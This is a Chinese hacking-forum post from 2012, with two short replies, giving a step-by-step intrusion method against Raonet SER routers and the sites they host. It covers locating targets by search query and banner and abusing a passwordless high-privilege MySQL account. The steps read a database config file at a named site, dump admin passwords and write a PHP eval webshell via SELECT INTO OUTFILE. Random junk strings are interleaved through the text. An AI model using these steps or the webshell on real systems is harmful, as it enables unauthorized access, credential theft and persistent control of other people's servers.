找回密码
 立即注册
查看: 3426|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
1 J+ T; x# F+ A
) O; l4 k' ~6 D1:google搜索'Raonet Subscriber Ethernet Router'# p4 y* G. e7 v/ a8 }7 w8 D; L
1 J  i9 e8 E" Y0 W
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20015 E0 h% T/ p! J* Z

1 W. W! \& Z3 g! ]- h* x2 d3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。" g/ Y1 @  x" r5 Z- V) g

- z1 _1 z( l8 v//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
. s" @$ u' k  j# k7 W5 F
  U$ l4 {0 ^4 _: I% j6 X 3 A- H5 L) T; k) i2 a* x

. k# m2 A, Z7 h/ R6 K入侵步骤:- U9 {( p7 ^' k# C3 p

% V- t" `. n& H. N2 d! r1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
. P3 v9 @# R/ f9 ~
! p0 A2 y' X! r+ E2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc( i0 f6 V: l. ?; w7 Q$ s
3:得到密码后连接,查看GUI管理密码:) x3 O5 ]5 \. p
use ser_500
# B/ E. |  G6 y) m; Q3 [( ?7 eselect id,passwd from user;
, c- U4 ?' t5 w4:通过数据库写入webshell,执行命令:  h8 q& R5 E( q. d
use mysql;# z- \: O3 J# o; Q! q
create table ok(cmd TEXT);
4 v1 ~: U; o& L8 B  G" Q7 jinsert into ok values("<?php @eval($_POST[cmd])?>");
6 a' L( ?- p+ i3 s$ u% F3 {! S' `select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";* r& R* h3 s* U  f/ G' t  Z' H
drop table ok;
0 G% t. |8 _$ q* J: @% y" f# H7 Q( E" z2 F8 H" e' J
5:连接后门shell.php 2 B; c0 @/ D8 j9 \- I( D8 ^
) M* `8 J6 O2 b
6. 搞定!; _+ v+ o. ~2 @

; g8 p$ ?; t7 M! N- x: D' n
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表